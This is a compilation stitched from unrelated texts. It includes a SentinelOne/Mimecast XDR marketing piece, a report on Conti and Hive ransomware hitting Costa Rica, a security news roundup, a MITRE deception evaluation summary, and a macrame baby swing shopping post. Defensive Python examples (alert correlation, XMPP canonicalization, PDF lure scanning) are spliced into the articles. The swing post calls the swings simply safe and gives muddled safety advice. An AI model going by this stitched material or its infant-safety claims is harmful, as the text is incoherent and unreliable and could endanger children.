Email Security and XDR | Simple Integration, Powerful Results

The State of Email Security

As tactics change, the sophistication of threat actors increases, and new vulnerabilities are constantly discovered, security operations teams are stretched to the limit investigating and remediating each incident. Email remains one of the most highly leveraged attack vectors. A staggering 79% of respondents to Mimecast’s State of Email Security 2022 study reported an increase in email volume at their organization, while 72% reported the number of email-based threats had risen during the past 12 months. Organizations today seek integrated defenses to protect email and improve incident response capabilities, while helping to reduce complexity, minimize risk, and decrease the demand on an already over-extended and under-staffed security team.

The State of Threat Intelligence

As email-based cyber attacks continue to rise, security teams are stretched and suffering from alert fatigue. They are still challenged by decision making and find themselves relying on the limited data found during an investigation, accepting that decisions will be made on incomplete knowledge because they do not have time to investigate further.

Another common challenge: Security teams spend so much time gathering data that they do not have time to solve the problem. Organizations have to reduce complexity, minimize risk, and decrease the demand they put on already overtasked security teams. In the meantime, threats can move laterally throughout the organization before they are properly identified and remediated.

The Cybersecurity Skills Gap

And while the volume, intensity, and intelligence of cyberthreats increase, the world is simultaneously seeing a shortage of skilled cybersecurity talent that continues to widen. Tight job market or not, SOC analysts remain fatigued with the collection, normalization, and prioritization of data, unable to focus on cybersecurity incident response and resolution. Organizations face challenges hiring and retaining skilled security professionals. The deluge of alerts from security tooling and repetitive nature of the Tier 1 analyst position makes burnout one of the leading contributors to this shortage.

A New Solution Has Become Necessary

Security teams look to automation to take over some of the repetitive tasks of incident response, so that their limited resources can focus on the highest-impact and most critical incidents, increasing throughput and reducing the time to respond. Integrating automation tools can help alleviate some of the alert and decision-making fatigue, data-gathering woes, worker burnout, and pain caused by a lack of skilled workers, but we can leverage technology to do much more than that. As threats become more complex and organizations face worker shortages, a more advanced method of detection – XDR – has become necessary for most organizations.

What Is XDR, and Why Is It So Critical?

In an era where there are essentially no network perimeters, and disastrous breaches can come from anywhere at any time, security teams must sharpen their focus on threat detection and response.

In many organizations, earlier approaches such as first-generation security information and event management (SIEM) systems have proven unwieldy. They can be difficult to deploy and integrate, and are too costly and too susceptible to false positives. Linking SIEM to security orchestration and response (SOAR) systems has helped some organizations build response playbooks for automating responses to certain threats, but creating these has often been more complex and difficult than anticipated.

Cloud-native XDR solutions promise to overcome each of these problems, providing more focused and actionable data, better integration, more relevant insights, fewer false positives, and easier automation of responses. As XDRs move beyond endpoint-only EDR solutions, they promise to provide the fuller visibility and faster response that couldn’t be achieved with earlier tools.

Integrated Solutions Stop Threats

Strategic integrations lessen SOC teams’ pain by using automation between email and endpoint security solutions to prevent the lateral movement of threats throughout the organization.

Mimecast and SentinelOne provide an integrated solution that stops threats and streamlines response across the organization. Customers can be confident their devices will be protected from zero-day threats across each endpoint. By correlating response between email and endpoint security solutions, analysts automate repetitive tasks for faster and more comprehensive incident response. When integrated, the two solutions deliver accelerated incident response and reduced mean time to response.

How the Mimecast and SentinelOne Integration Works

SentinelOne Singularity XDR provides AI-powered prevention, detection, and response across endpoints, cloud workloads, and IoT devices. When a threat is detected in SentinelOne, SentinelOne Storyline™ correlates detections and activity data across security layers, including email, endpoints, mobile, and cloud. Analysts can streamline the organization’s response by automatically suspending email for a given user, blocking the user’s email, or quarantining it. Upon detection of the threat, SentinelOne can automatically suspend the last logged-in user’s ability to send email, helping secure a critical lateral movement path.
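The correlation step described above can be written down as plain detection logic: join an endpoint detection to the email gateway's delivery log by attachment hash, then derive the response actions (suspend the last logged-in user's outbound mail, quarantine every copy of the originating message, block the hash at the gateway). The block below is an added example and is not Mimecast or SentinelOne code; the alert and log records are constructed, and every field name (`host`, `last_user`, `sha256`, `attachment_sha256`, `message_id`) is an assumption about how such exports might look.

```python
"""Correlate an endpoint detection with email gateway logs to pick response actions.

Added example, not vendor code. All records are constructed and the field names are
assumptions; a real integration would read both feeds from the vendors' APIs.
"""
from collections import defaultdict

# Constructed endpoint detection, as an XDR console might export it (fields assumed).
ENDPOINT_ALERTS = [
    {"host": "LAPTOP-17", "last_user": "a.rivera@example.com",
     "sha256": "ab12" * 16, "verdict": "malicious"},
    {"host": "LAPTOP-03", "last_user": "c.okafor@example.com",
     "sha256": "cd34" * 16, "verdict": "benign"},
]

# Constructed email gateway delivery log (fields assumed). The same message was
# delivered to two recipients; only one of them has executed the attachment so far.
EMAIL_LOG = [
    {"message_id": "<m1@mail.example>", "sender": "invoices@vendor-example.net",
     "recipient": "a.rivera@example.com", "attachment_sha256": "ab12" * 16},
    {"message_id": "<m1@mail.example>", "sender": "invoices@vendor-example.net",
     "recipient": "b.chen@example.com", "attachment_sha256": "ab12" * 16},
    {"message_id": "<m2@mail.example>", "sender": "hr@example.com",
     "recipient": "a.rivera@example.com", "attachment_sha256": "ff00" * 16},
]


def correlate(alerts, email_log):
    """Return an ordered, de-duplicated list of response actions for malicious alerts."""
    deliveries_by_hash = defaultdict(list)
    for rec in email_log:
        deliveries_by_hash[rec["attachment_sha256"]].append(rec)

    actions = []
    for alert in alerts:
        if alert["verdict"] != "malicious":
            continue
        # 1. Cut the lateral-movement path: the last logged-in user stops sending outbound mail.
        actions.append(("suspend_outbound", alert["last_user"]))
        # 2. Find how the file arrived and pull every copy of that message, including
        #    the ones sitting unopened in other mailboxes.
        deliveries = deliveries_by_hash.get(alert["sha256"], [])
        for d in deliveries:
            actions.append(("quarantine_message", d["message_id"], d["recipient"]))
        # 3. Block the attachment hash at the gateway so repeats never reach an inbox.
        if deliveries:
            actions.append(("block_attachment_hash", alert["sha256"]))

    seen, ordered = set(), []
    for action in actions:
        if action not in seen:
            seen.add(action)
            ordered.append(action)
    return ordered


if __name__ == "__main__":
    for action in correlate(ENDPOINT_ALERTS, EMAIL_LOG):
        print(action)
```

Running it against the constructed data yields four actions: one outbound suspension for `a.rivera@example.com`, two quarantines for message `<m1@mail.example>` (one per recipient, so `b.chen@example.com` is covered before opening the attachment), and one hash block. The unrelated HR message to the same user is left alone because its attachment hash does not match the detection.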

Sample Attack Timeline Without XDR Integration

Sample Attack Timeline With XDR Integration

Stopping Attacks Like LAPSUS$

Integrated solutions like the one from SentinelOne and Mimecast can stop prominent and damaging attacks like the recent LAPSUS$ attacks.

Threat actors such as LAPSUS$ take the time needed to research employees at a company they have decided to target. They first compromise the employee’s personal network and search for credentials that can be used to access corporate systems. This is particularly easy if the employee uses the same passwords for both their personal and corporate accounts. Even if the attacker does not find the credentials they are looking for, they can use the information they have already obtained to reset passwords and complete account recovery actions. Attackers like LAPSUS$ have even been known to call a company’s IT Helpdesk to attempt to get credentials reset.

The SentinelOne and Mimecast integration can stop attacks like LAPSUS$ by preventing them from moving laterally. The two solutions share information about threats that have been identified, reducing the likelihood that an attack will be successful. Security Awareness Training can also play an important part in thwarting attacks like LAPSUS$, giving employees an edge in identifying potential threats that can arrive in either their personal or work email.

The Bottom Line

Email security and XDR are the ideal pairing for security teams that are overtasked and struggling to keep up with alert volume and a never-ending stream of threats delivered via email. For more information about how your organization can benefit from this joint SentinelOne and Mimecast solution, read our joint solution brief.

Costa Rica May Be Pawn in Conti Ransomware Group’s Bid to Rebrand, Evade Sanctions

Costa Rica’s national health service was hacked sometime earlier this morning by a Russian ransomware group known as Hive. The intrusion comes just weeks after Costa Rican President Rodrigo Chaves declared a state of emergency in response to a data ransom attack from a different Russian ransomware gang — Conti. Ransomware experts say there is good reason to believe the same cybercriminals are behind both attacks, and that Hive has been helping Conti rebrand and evade international sanctions targeting extortion payouts to cybercriminals operating in Russia.

The Costa Rican publication CRprensa.com reports that affected systems at the Costa Rican Social Security Fund (CCSS) were taken offline on the morning of May 31, but that the extent of the breach was still unclear. The CCSS is responsible for Costa Rica’s public health sector, and worker and employer contributions are mandated by law.

The fallout from this latest attack is not yet clear, but it is likely to be disruptive: A hand-written sign posted outside a public health center in Costa Rica today explained that all systems are down until further notice (thanks to @Xyb3rb3nd3r for sharing this photo).

A hand-written notice posted outside a public health clinic today in Costa Rica warned of system outages due to a cyberattack on the nation’s healthcare systems.

A copy of the ransom note left behind by the intruders and subsequently uploaded to Virustotal.com indicates the CCSS intrusion was the work of Hive, which typically demands payment for a digital key needed to unlock files and servers compromised by the group’s ransomware.

A HIVE ransomware chat page for a specific victim (redacted).

On May 8, President Chaves used his first day in office to declare a national state of emergency after the Conti ransomware group threatened to publish gigabytes of sensitive data stolen from Costa Rica’s Ministry of Finance and other government agencies. Conti initially demanded $10 million, and later doubled the amount when Costa Rica refused to pay. On May 20, Conti leaked more than 670 gigabytes of data taken from Costa Rican government servers.

As CyberScoop reported on May 17, Chaves told local media he believed that collaborators within Costa Rica were helping Conti extort the government. Chaves offered no information to support this claim, but the timeline of Conti’s descent on Costa Rica is worth examining.

Most of Conti’s public communications about the Costa Rica attack have very clearly assigned credit for the intrusion to an individual or group calling itself “unc1756.” In March 2022, a new user by the same name registered on the Russian language crime forum Exploit.

A message Conti posted to its dark web blog on May 20.

On the evening of April 18, Costa Rica’s Ministry of Finance disclosed the Conti intrusion via Twitter. Earlier that same day, the user unc1756 posted a help wanted ad on Exploit saying they were looking to buy access to “special networks” in Costa Rica.

“By special networks I mean something like Haciendas,” unc1756 wrote on Exploit. Costa Rica’s Ministry of Finance is known in Spanish as the “Ministerio Hacienda de Costa Rica.” Unc1756 said they would pay USD 500 or more for such access, and would work only with Russian-speaking people.

THE NAME GAME DISTRACTION

Experts say there are clues to suggest Conti and Hive are working together in their attacks on Costa Rica, and that the intrusions are tied to a rebranding effort by Conti. Shortly after Russia invaded Ukraine at the end of February, Conti declared its full support, aligning itself directly with Russia and against anyone who would stand against the motherland.

Conti’s threatening message this week regarding international interference in Ukraine.

Conti quickly deleted the declaration from its website, but the damage had already been done, and any favor or esteem that Conti had earned among the Ukrainian cybercriminal underground effectively evaporated overnight.

Shortly thereafter, a Ukrainian security expert leaked many months worth of internal chat records between Conti personnel as they plotted and executed attacks against hundreds of victim organizations. Those candid messages exposed what it’s like to work for Conti, how they undermined the security of their targets, as well as how the group’s leaders strategized for the upper hand in ransom negotiations.

But Conti’s declaration of solidarity with the Kremlin also made it increasingly ineffective as an instrument of financial extortion. According to cyber intelligence firm ADVIntel, Conti’s alliance with the Russian state soon left it largely unable to receive ransom payments because victim companies are being advised that paying a Conti ransom demand could mean violating U.S. economic sanctions on Russia.

“Conti as a brand became associated with the Russian state — a state that is currently undergoing extreme sanctions,” ADVIntel wrote in a lengthy analysis (PDF). “In the eyes of the state, each ransom payment going to Conti may have potentially gone to an individual under sanction, turning simple data extortion into a violation of OFAC regulation and sanction policies against Russia.”

Conti is by far the most aggressive and profitable ransomware group in operation today. Image: Chainalysis

ADVIntel says it first learned of Conti’s intrusion into Costa Rican government systems on April 14, and that it has seen internal Conti communications indicating that getting paid in the Costa Rica attack was not the goal.

Rather, ADVIntel argues, Conti was simply using it as a way to appear publicly that it was still operating as the world’s most lucrative ransomware collective, when in reality the core Conti leadership was busy dismantling the crime group and folding themselves and top affiliates into other ransomware groups that are already on friendly terms with Conti.

“The only goal Conti had wanted to meet with this final attack was to use the platform as a tool of publicity, performing their own death and subsequent rebirth in the most plausible way it could have been conceived,” ADVIntel concluded.

ADVIntel says Conti’s leaders and core affiliates are dispersing to several Conti-loyal crime collectives that use either ransomware lockers or strictly engage in data theft for ransom, including AlphV/BlackCat, AvosLocker, BlackByte, HelloKitty, Hive, and Karakurt.

Still, Hive appears to be perhaps the biggest beneficiary of any attrition from Conti: Twice over the past week, both Conti and Hive have claimed responsibility for hacking the same companies. When the discrepancy was called out on Twitter, Hive updated its website to claim it was not affiliated with Conti.

Conti and Hive’s Costa Rican exploits mark the latest in a string of recent cyberattacks against government targets across Latin America. Around the same time it hacked Costa Rica in April, Conti announced it had hacked Peru’s National Directorate of Intelligence, threatening to publish sensitive stolen data if the government did not pay a ransom.

But Conti and Hive are not alone in targeting Latin American victims of late. According to data gathered from the victim shaming blogs maintained by multiple ransomware groups, over the past 90 days ransom actors have hacked and sought to extort 15 government agencies in Brazil, nine in Argentina, six in Colombia, four in Ecuador and three in Chile.

A recent report (PDF) by the Inter-American Development Bank suggests many Latin American countries lack the technical expertise or cybercrime laws to deal with today’s threats and threat actors.

“This study shows that the Latin American and Caribbean (LAC) region is not sufficiently prepared to handle cyberattacks,” the IADB document explains. “Only 7 of the 32 countries studied have a critical infrastructure protection plan, while 20 have established cybersecurity incident response teams, often called CERTs or CSIRTs. This limits their ability to identify and respond to attacks.”

Macrame Baby Swing – A Boho-Inspired Addition To Your Child’s Room

Are you looking for a fun, boho-inspired addition to your child’s room? Then a macrame baby swing is a must-have. It’s perfect for those lazy summer days when you want to relax and watch your little one play.

Macrame baby swings are becoming increasingly popular, and it’s no wonder why. They add a touch of whimsy and charm to any room. Macrame baby swings are similar to hammocks, but they’re smaller and have a more delicate design.

Whether you want to buy a macrame baby swing or do it yourself, we’ve got you covered. This article will show you how to make your own macrame baby swing and where to buy one if you’re not up for the DIY challenge.

What Is Macrame?

Macrame is a form of textile-making that uses knotting techniques to create intricate patterns. It first became popular in the 1970s but has seen a resurgence in recent years due to the bohemian/boho-chic trend.

While macrame can be used to create a wide variety of items, it’s often used to make wall hangings, plant hangers, and other home decor items.

Is A Macrame Baby Swing Safe?

Yes, macrame baby swings are safe. They’re made out of lightweight materials and have sturdy construction. However, it’s important to make sure that the swing is hung securely and that there’s nothing nearby that your child could bump into while playing.

A lot of the time, macrame baby swings come with wooden elements like a bar or hoop. These can add extra stability and security to the swing.

Where To Put The Macrame Baby Swing?

Macrame baby swings can be hung indoors or outdoors. They look great in a child’s bedroom, playroom, or even living room. If you’re planning on using it outdoors, choose a shady spot out of the way of any potential hazards.

As with any piece of baby gear, there are some safety considerations to keep in mind when using a macrame baby swing.

  1. Always use the swing indoors or in a shady, well-ventilated area outdoors. The swing should never be left in direct sunlight.
  2. Make sure the swing is on a level surface before letting your child use it. The last thing you want is for the swing to tip over while your child is in it.
  3. Never leave your child unattended in the swing. Always stay within arm’s reach in case your child needs help getting out or falls asleep in the swing.
  4. Inspect the swing regularly for any signs of wear and tear. If you see any fraying or damage to the rope, discontinue the use of the swing and replace the damaged parts.

By following these simple safety tips, you can ensure your child has a safe and enjoyable experience in their macrame baby swing.

Best Ready-To-Buy Macrame Baby Swings

If you’re not up for the challenge of making your own macrame baby swing, then there are plenty of options available to purchase. Here are some of our favorites!

S.N.HANDICRAFTS Handmade Macrame Baby Swing

This macrame baby swing is handmade in India using 100% cotton rope. It’s durable and perfect for indoor or outdoor use. Perfect for toddlers up to 50 lbs.

Mass Lumber Macrame Baby Swing Outdoor Seat with Belt

This macrame baby swing is made out of durable materials. It has a safety belt to keep your child secure and can hold up to 110 lbs. Perfect for use outdoors.

NA Wooden Macrame Baby Swing

A high-quality, handmade cotton Macrame baby swing composed of solid wood and knitted by hand, offering excellent safety and quality. The baby swing includes a 39-inch chain and a non-slip children’s seat cushion, which is both comfortable and supportive for your little one.

The swing may be raised or lowered as required to ensure that the infant is more comfortable. The swing can bear up to 80 pounds, and it is designed for children aged 1-5.

Bean Sprout Baby Collection – Baby Hammock Swing Chair

The Bean Sprout Baby Hammock Swing Chair is the perfect place for your little one to relax. It is a premium quality macrame baby swing made of 100% cotton. It is soft, comfortable, and safe for your baby.

Choosing A Macrame Baby Swing

When choosing a macrame baby swing, there are a few things to keep in mind. First, consider the size of the swing. It should be big enough for your baby to comfortably sit or lie down in but not so large that it takes up too much space in the room.

Second, think about the design. There are many different macrame patterns to choose from. Some are more intricate than others. Consider the overall style of your home and choose a swing that fits in with the rest of your decor.

Last, think about functionality. Some swings come with additional features like a wooden bar or hoop. These can add stability and security to the swing. Others come with removable cushions for added comfort. Choose the features that are most important to you and your family.

How To Make Macrame Baby Swing Yourself

Making your own macrame baby swing is excellent if you’re feeling crafty and up for the challenge. You will save money, but you’ll also get to choose the perfect design and color scheme for your home.

The Internet is full of different tutorials on making a macrame baby swing. We recommend you check out this step-by-step guide:

What Do You Need To Make A Macrame Baby Swing?

  • Macrame cord
  • Wooden dowel or hoop
  • Wooden base
  • Scissors
  • Tape measure
  • Pencil or pen
  • Paper clips

Choosing the suitable macrame cord/rope is crucial in making your own macrame baby swing. The cord should be strong enough to support your child’s weight but also soft and comfortable to the touch.

We recommend using a 3/8-inch (9mm) cotton rope. This size is strong enough to support most babies and toddlers, but it’s also soft and gentle on the skin.

Other popular macrame cords are made of jute or hemp. These materials are also strong and durable, but they’re not as soft as cotton. If you choose to use one of these materials, add a cushion or padding to the swing, so your child is comfortable.

When searching for a macrame baby swing pattern or tutorial, double-check a list of supplies needed. Some designs call for special tools or equipment that you may not have around the house.

We also recommend reading through the entire pattern before starting. This will help you understand the steps involved and ensure you have everything you need.

How Much Macrame Cord Do I Need For A Swing?

The amount of cord you need will depend on the size of the swing and the design you choose.
Most macrame baby swing patterns call for between 50 and 100 feet (15 to 30 meters) of macrame cord.

We recommend purchasing at least 200 feet (60 meters) of cord to be safe. This will give you enough to make a baby swing and allow some mistakes along the way. You can always use the extra cord for another project or donate it to a local craft store.

What Size Rope Is Best For A Baby Swing?

The most popular macrame cord size for a baby swing is 3/8-inch (9mm). This size is strong enough to support most babies and toddlers, but it can vary depending on a particular project.

Why Make A Macrame Baby Swing?

A macrame baby swing is a beautiful and unique addition to your child’s nursery or playroom. Not only is it eye-catching, but it’s also sturdy and functional.

As your child grows, they’ll be able to enjoy the swing as a fun place to play or relax. And when they’re no longer using it, you can easily repurpose it into a wall hanging or other home decor item.

If you decide to make a macrame baby swing yourself, it’s a great way to add a personal touch to your child’s room. Plus, there is something very satisfying about creating something beautiful with your own two hands. Your baby will be able to enjoy the swing for years to come, and it will always hold sentimental value.

The post Macrame Baby Swing – A Boho-Inspired Addition To Your Child’s Room appeared first on Comfy Bummy.

The Good, The Bad and the Ugly in Cybersecurity – Week 22

The Good

Nigerian authorities have arrested a 37-year-old man alleged to be the leader of the SilverTerrier (Team TMT) business email compromise gang.

Interpol announced the arrest on Wednesday, and detailed how Interpol’s Africa Desk, AFJOC (African Joint Operation against Cybercrime), Nigerian law enforcement, and other private sector partners successfully tracked and apprehended the suspect.

According to the statement, Operation Delilah began in May 2021, led by Nigerian police with three Interpol partners offering intelligence to the AFJOC.

Public and industrial analysts from Interpol’s Cyber Fusion Centre enriched the intelligence before referring it to the Nigerian police. Australian, Canadian and American law enforcement also supported the investigation by participating in several case-coordinating meetings.

With support from a private sector firm, investigators mapped out and tracked the suspect’s online activities and physical travel before police made the arrest at Murtala Mohammed International Airport in Lagos.

In their statements, Interpol officials expressed their hope that the operation would “stand as a reminder to cyber criminals across the world that law enforcement will continue to pursue them, and that this arrest will bring comfort to victims of the suspect’s alleged campaigns.”

This operation offers encouraging signs that governments and law enforcement officials across the world are taking notice of escalating cyber crime and proactively taking action to investigate and neutralize major threats. While the road ahead is a long one, the international investment displayed here, and the cooperation of major vendors in the private sector, is a great first step towards a safer cybersecurity landscape.

The Bad

This week, details emerged of an attack chain against Zoom clients that potentially left all Zoom users exposed to a zero-click vulnerability. Several bugs were discovered by a security researcher in February and Zoom released a patch in late April. All Zoom users are urged to ensure they update to version 5.10.0 if they have not already done so.

According to Zoom’s advisory, CVE-2022-22784 could allow an attacker to break out of the current XMPP message context and force a user’s client to perform a variety of malicious actions.

The same researcher also identified CVE-2022-22785, a vulnerability that allows threat actors to send user session cookies to a domain outside of Zoom, which leaves users open to spoofing attacks, and CVE-2022-22786, which allows an attacker to trick a user into downgrading their Zoom client to a less secure version.

Chaining the vulnerabilities together could allow an attacker to achieve remote code execution (RCE) without any user interaction.


Explaining the attack chain, Ivan Fratric, the Google Project Zero researcher responsible for discovering the bugs, said “The only ability an attacker needs is to be able to send messages to the victim over Zoom chat over XMPP protocol”.

He went on to explain that a threat actor could trick a targeted Zoom client into connecting to a man-in-the-middle server that downgrades the target’s Zoom client to a version from 2019.

These RCE attacks are possible because Zoom’s clients and servers use different XML parsing libraries, which means they also parse XMPP messages differently.

Although Zoom patched its servers against these vulnerabilities when they were first discovered in February, the client patch was only recently released. Zoom users that haven’t updated yet should patch their clients immediately to mitigate the risk.
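The root cause named above, two components parsing the same XMPP stanza with different XML libraries and therefore disagreeing about what it says, has a standard defensive counter: parse each stanza exactly once at the boundary, refuse constructs that parsers are known to disagree on, and forward only the re-serialized form of that one parsed tree, so that no downstream component ever sees the original bytes. The block below is an added example of that canonicalization step and is not Zoom's code; the allowed stanza names and the list of rejected markers are assumptions for illustration.

```python
"""Canonicalize XMPP stanzas through a single parser before forwarding them.

Added example, not Zoom's code. Every hop that relays the output of
normalize_stanza() sees one and the same document, which removes the room for
parser disagreement. ALLOWED_ROOTS and FORBIDDEN_MARKERS are assumptions.
"""
import xml.etree.ElementTree as ET

ALLOWED_ROOTS = {"message", "presence", "iq"}  # assumed stanza whitelist
# Assumed: constructs that are rejected outright rather than interpreted.
FORBIDDEN_MARKERS = ("<!DOCTYPE", "<!ENTITY", "<?", "<!--")


class StanzaRejected(ValueError):
    """Raised when a stanza must not be forwarded."""


def _local_name(tag: str) -> str:
    # ElementTree spells namespaced tags as '{uri}local'; keep the local part.
    return tag.rsplit("}", 1)[-1]


def _canonical(elem: ET.Element) -> ET.Element:
    # Rebuild the tree with attributes in sorted order so that equivalent stanzas
    # written differently (spacing, attribute order, quote style) serialize identically.
    new = ET.Element(elem.tag, dict(sorted(elem.attrib.items())))
    new.text = elem.text
    for child in elem:
        child_copy = _canonical(child)
        child_copy.tail = child.tail
        new.append(child_copy)
    return new


def normalize_stanza(raw: str) -> str:
    """Parse once, validate, and return the one serialization every hop should use."""
    for marker in FORBIDDEN_MARKERS:
        if marker in raw:
            raise StanzaRejected(f"forbidden construct {marker!r}")
    try:
        root = ET.fromstring(raw)  # also rejects a second root element ("junk after document element")
    except ET.ParseError as exc:
        raise StanzaRejected(f"not well-formed: {exc}") from exc
    if _local_name(root.tag) not in ALLOWED_ROOTS:
        raise StanzaRejected(f"unexpected stanza type {root.tag!r}")
    return ET.tostring(_canonical(root), encoding="unicode")


if __name__ == "__main__":
    # Two spellings of the same stanza collapse to identical bytes.
    print(normalize_stanza("<message to='a' type='chat'><body>hi</body></message>"))
    print(normalize_stanza('<message type="chat"  to="a" ><body >hi</body></message >'))
    for bad in ("<!DOCTYPE x><message/>", "<message/><message/>", "<stream/>"):
        try:
            normalize_stanza(bad)
        except StanzaRejected as exc:
            print("rejected:", exc)
```

The design choice worth noting is that the relay never passes on the raw bytes it received, only `ET.tostring()` of the tree it parsed; the marker check is a belt-and-braces filter in front of that, not the main defense. The `<?` marker also rejects an XML declaration, which is acceptable for stanzas inside an already-open XMPP stream.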

The Ugly

HP’s security researchers are observing a malware campaign that leverages malicious PDFs to target Windows PCs with malware through a code-execution vulnerability in MS Office that was discovered four years ago.

According to HP’s threat intelligence, threat actors trick targets into opening malicious emails and a PDF document labelled as a remittance invoice. Once the victim opens the document, the PDF file will load a fake Adobe Reader prompt designed to look legitimate and prompt users to open a malicious Word document.


Ultimately, this attack chain is designed to deliver an executable from the Snake keylogger family, which steals information from targeted users.
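A mail gateway does not need to fully parse a PDF to catch the shape of the lure described above: a PDF that both embeds a file with an Office extension and carries something that runs when the document opens is worth quarantining on its own. The block below is an added example of such a check, not HP's or any vendor's detection logic; both PDFs are constructed fragments, and the indicator patterns and verdict thresholds are assumptions.

```python
"""Flag PDFs that embed an Office document alongside an open-time action.

Added example, not vendor detection logic. The two PDFs are constructed
fragments (not real samples) and the indicator table is an assumption; a
production scanner would additionally inflate compressed object streams.
"""
import re

# Constructed fragment carrying the indicators of interest: an embedded file
# named like a Word document plus an OpenAction backed by JavaScript.
SUSPICIOUS_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R
  /Names << /EmbeddedFiles << /Names [(remittance_invoice.docx) 4 0 R] >> >> >> endobj
4 0 obj << /Type /Filespec /F (remittance_invoice.docx) /EF << /F 6 0 R >> >> endobj
5 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj
6 0 obj << /Type /EmbeddedFile /Length 0 >> stream
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed plain document with no attachments and no actions.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Same content with a PDF name written using a #xx escape, which a naive
# substring match would miss.
OBFUSCATED_PDF = SUSPICIOUS_PDF.replace(b"/EmbeddedFile", b"/Embedded#46ile")

INDICATORS = {
    "embedded_file":     rb"/EmbeddedFile\b",
    "open_action":       rb"/OpenAction\b",
    "javascript":        rb"/JavaScript\b|/JS\b",
    "launch":            rb"/Launch\b",
    "office_attachment": rb"\.(?:docx?|docm|xlsx?|xlsm|pptx?|rtf)\)",
}
AUTO_RUN = {"open_action", "javascript", "launch"}


def unescape_names(data: bytes) -> bytes:
    """PDF names may spell any character as #xx (e.g. /Embedded#46ile); undo that first."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Count indicator hits and return a verdict of allow, review or quarantine."""
    data = unescape_names(data)
    hits = {name: len(re.findall(pat, data)) for name, pat in INDICATORS.items()}
    hits = {name: n for name, n in hits.items() if n}
    if "embedded_file" in hits and (AUTO_RUN & hits.keys() or "office_attachment" in hits):
        verdict = "quarantine"   # attachment plus a way to push the user toward it
    elif hits:
        verdict = "review"       # e.g. JavaScript alone: suspicious, not conclusive
    else:
        verdict = "allow"
    return {"indicators": hits, "verdict": verdict}


if __name__ == "__main__":
    for label, pdf in (("suspicious", SUSPICIOUS_PDF), ("benign", BENIGN_PDF), ("obfuscated", OBFUSCATED_PDF)):
        print(label, scan_pdf(pdf))
```

The verdict deliberately keys on the combination: an embedded file by itself is common in legitimate mail (signed contracts, attached spreadsheets), whereas an embedded Office document together with an action that fires on open matches the lure-then-prompt flow and is rare in benign traffic.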

While malicious PDFs are hardly new, in recent years cyber criminals have primarily exploited Word documents or Excel sheets to infect machines with malware. However, researchers believe that the PDF format’s relative scarcity in today’s threat landscape is not only due to widespread awareness of Microsoft Office files but also to the belief that other document formats serve as better social engineering lures.

The existence of malicious documents like these is truly disruptive to vulnerable users and reminds us that not every emerging threat is cutting edge—older threats can still do just as much damage.

SentinelOne Debuts at the Top of MITRE Engenuity ATT&CK® Deception Evaluation. See Why.

Released May 25, 2022, MITRE Engenuity ATT&CK® Evaluation Trials – Deception is an inaugural evaluation that expands the ATT&CK Evaluations landscape to evaluate vendors on their deception capabilities. The evaluation can dramatically increase analyst confidence in detection via high fidelity tripwires, causing the adversary to waste time, money, or capability, and potentially provide vendors critical new insights into adversary behavior.

What Did the ATT&CK Deception Evaluation Consist Of?

For this evaluation, MITRE chose to emulate the APT29 threat group. APT29 is a threat group that has been attributed to the Russian government and has operated since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. The evaluation seeks to answer two questions:

  1. Did the adversary encounter the deception? (Observe)
  2. Did the adversary engage with the deception? (Engage)
  • Observe: Determining whether the adversary encountered the deception is straightforward. The evaluation determines this by running the adversary technique and recording whether it sees something different from a scenario that did not deploy deception. For the Observe portion of the evaluation, the MITRE Engenuity team did not interact with the deception.
  • Engage: To fully capture the value of the vendor participants’ products, the MITRE Engenuity team executed a modified scripted plan that allowed deeper interaction with the deceptions. In the Engage portion of the evaluation, the red team would go off-script and interact with a deception if it was present. When the red team engaged, they would exhaust all interactions before going back to the script.

How Did SentinelOne Perform on the ATT&CK Deception Evaluation?

As evidenced by the results of all four years of the ATT&CK Enterprise Evaluations, the SentinelOne Singularity XDR platform already excels at visibility and detection. With SentinelOne’s Hologram deception solution tested in this evaluation, SentinelOne also protects the enterprise against sophisticated identity-based attacks.

According to MITRE Engenuity’s published results, SentinelOne observed and/or engaged with most detections, identifying 17 unique techniques, including 11 techniques that targeted identities specifically. SentinelOne’s Singularity XDR platform – and specifically its Hologram deception technology – was recognized for its ability to:

  1. Deliver Real-time Protection Against Active Directory (AD) Compromise.
    A security compromise of AD can essentially undermine the integrity of the entire enterprise, enabling adversaries to steal credentials and gain access to critical systems.

    SentinelOne protects AD privileged credentials from theft by hiding them from attackers and replacing them with decoys. During the MITRE Deception evaluation, when the MITRE red team tried to get access to the system to get account information and credentials (T1033, T1082, T1087), the solution returned decoy credentials to them every time.
    Console output showing the attempted credential enumeration

    This enables the security team to protect in real-time against advanced attacks targeting Active Directory.

  2. Mislead Attackers To Protect Critical Assets With Data Cloaking.

    Attackers steal and destroy information as part of their attacks, whether they seek to move deeper into the network or hold data for ransom. Preventing them from seeing or accessing local file and account information can prevent lateral movement, discovery, and data theft or destruction.

    SentinelOne steers adversaries away by misdirection, showing decoys indistinguishable from production assets. During the MITRE Deception evaluation, when the red team tried to monitor system activity and queried for the computer name, SentinelOne reported decoy hostname “Newburgh” instead of the actual hostname “Utica” (T1082). When the red team tried to manipulate the software and engage with the file by browsing to it, SentinelOne hid the file from the directory listing (T1560).

    Console output showing the attempted discovery activities

    By preventing attackers from seeing or exploiting critical data, organizations can disrupt discovery or lateral movement activities and limit the damage from ransomware attacks.

  3. Stop Lateral Movement and Privilege Escalation By Preventing Pass-The-Ticket Attacks.

    Pass-the-Ticket attacks, such as Golden Ticket and Silver Ticket attacks, are powerful techniques adversaries use for post-exploitation lateral movement and privilege escalation. With a forged Kerberos ticket, an attacker can gain access to any endpoint or service on the network, with potentially catastrophic consequences.

    During the MITRE Deception evaluation, when the red team created a ticket, the terminal output of klist reported no cached tickets: SentinelOne detected the Kerberos attack and hid the forged ticket from the klist output (T1550).
    Console output showing the Pass-the-Ticket attack attempt

